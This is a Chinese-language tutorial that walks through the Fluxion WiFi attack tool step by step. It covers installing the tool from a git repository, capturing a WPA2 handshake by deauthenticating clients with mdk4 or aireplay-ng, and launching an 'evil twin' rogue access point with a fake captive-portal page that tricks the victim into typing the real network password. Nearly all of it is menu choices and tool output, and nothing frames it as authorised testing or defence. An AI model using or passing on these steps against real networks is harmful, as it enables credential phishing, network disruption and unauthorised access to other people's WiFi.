Fluxion工具
下载地址与安装
git clone https://github.com/shivers0x72/fluxion.git
./fluxion.sh -i
//选择 17 中文
步骤
//开始前插上可监听无线网卡
./fluxion.sh
'''
[*] 请选择一个攻击方式
ESSID: "[N/A]" / [N/A]
Channel: [N/A]
BSSID: [N/A] ([N/A])
[1] 专属门户 创建一个“邪恶的双胞胎”接入点。
[2] Handshake Snooper 检索WPA/WPA2加密散列。
[3] 返回
'''
2
'''
[*] 选择要扫描的信道
[1] 扫描所有信道 (2.4GHz)
[2] 扫描所有信道 (5GHz)
[3] 扫描所有信道 (2.4GHz & 5Ghz)
[4] 扫描指定信道
[5] 返回
'''
1//捕获到目标wifi后ctrl+c停止
'''
[012] shivers 100% -25 0 11 WPA2 FC:AB:90:A9:E2:59
'''
12
'''
[*] 为目标跟踪选择无线接口.
[*] 可能需要选择专用接口.
[*] 如果您不确定,请选择"跳过"!
[1] wlan0 [*] D-Link Corp. DWA-140 RangeBooster N Adapter(rev.B3) [Ralink RT5372]
[2] 跳过
[3] 重试
[4] 返回
'''
2
'''
[*] 选择一种方式来检查握手包获取状态
[1] 监听模式 (被动)
[2] aireplay-ng 解除认证方式 (侵略性)
[3] mdk4 解除认证方式 (侵略性)
[4] 返回
'''
3//2和3都可以
'''
[*] 选择Hash的验证方法
[1] aircrack-ng 验证 (不推荐)
[2] cowpatty 验证 (推荐用这个)
[3] 返回
'''
2
'''
[*] 每隔多久检查一次握手包
[1] 每30秒钟 (推荐).
[2] 每60秒钟
[3] 每90秒钟
[4] 返回
'''
1
'''
[*] 如何进行验证?
[1] Asynchronously (fast systems only).
[2] Synchronously (推荐).
[3] 返回
'''
2
//开始抓包..
//可以发现连上的wifi网络断开
'''
[*] Handshake Snooper 正在进行攻击......
[1] 选择启动攻击方式
[2] 退出
'''
1
'''
[*] 请选择一个攻击方式
ESSID: "shivers" / WPA2
Channel: 11
BSSID: FC:AB:90:A9:E2:59 ([N/A])
[1] 专属门户 创建一个“邪恶的双胞胎”接入点。
[2] Handshake Snooper 检索WPA/WPA2加密散列。
[3] 返回
'''
1
'''
[*] Fluxion正在瞄准上面的接入点.
[*] 继续这个目标? [Y/n]
'''
y
'''
[*] 为目标跟踪选择无线接口.
[*] 可能需要选择专用接口.
[*] 如果您不确定,请选择"跳过"!
[1] wlan0 [*] D-Link Corp. DWA-140 RangeBooster N Adapter(rev.B3) [Ralink RT5372]
[2] 跳过
[3] 重试
[4] 返回
'''
2
'''
[*] 为接入点选择一个接口
[1] docker0 [+] D-Link Corp. DWA-140 RangeBooster N Adapter(rev.B3) [Ralink RT5372]
[2] eth0 [-] Advanced Micro Devices, Inc. [AMD] 79c970 [PCnet32 LANCE] (rev 10)
[3] wlan0 [*] D-Link Corp. DWA-140 RangeBooster N Adapter(rev.B3) [Ralink RT5372]
[4] 重试
[5] 返回
'''
3
'''
[*] Select a method of deauthentication
[1] mdk4
[2] aireplay
[3] mdk3
'''
3
'''
[*] 选择一个接入点
ESSID: "shivers" / WPA2
Channel: 11
BSSID: FC:AB:90:A9:E2:59 ([N/A])
[1] 流氓 AP - hostapd (推荐)
[2] 流氓 AP - airbase-ng (缓慢)
[3] 返回
'''
1
'''
[*] 请选择验证密码方式
ESSID: "shivers" / WPA2
Channel: 11
BSSID: FC:AB:90:A9:E2:59 ([N/A])
[1] hash - cowpatty
[2] hash - aircrack-ng (default, unreliable)
[3] 返回
'''
1
'''
[*] 发现目标热点的Hash文件.
[*] 你想要使用这个文件吗?
[1] 使用抓取到的hash文件
[2] 指定hash路径
[3] 握手包目录(重新扫描)
[4] 返回
'''
1
'''
[*] 选择Hash的验证方法
ESSID: "shivers" / WPA2
Channel: 11
BSSID: FC:AB:90:A9:E2:59 ([N/A])
[1] aircrack-ng 验证 (不推荐)
[2] cowpatty 验证 (推荐用这个)
'''
2
'''
[*] 选择钓鱼认证门户的SSL证书来源
[1] 创建SSL证书
[2] 检测SSL证书 (再次搜索)
[3] 没有证书 (disable SSL)
[4] 返回
'''
1
'''
[*] 为流氓网络选择Internet连接类型
[1] 断开原网络 (推荐)
[2] 仿真
[3] 返回
'''
1
'''
[03] 通用认证网页 Chinese
'''
3
//出现六个窗口,目标wifi断开
//连接同名钓鱼WiFi时就会弹出认证窗口
//直到目标输入正确密码,完成一次攻击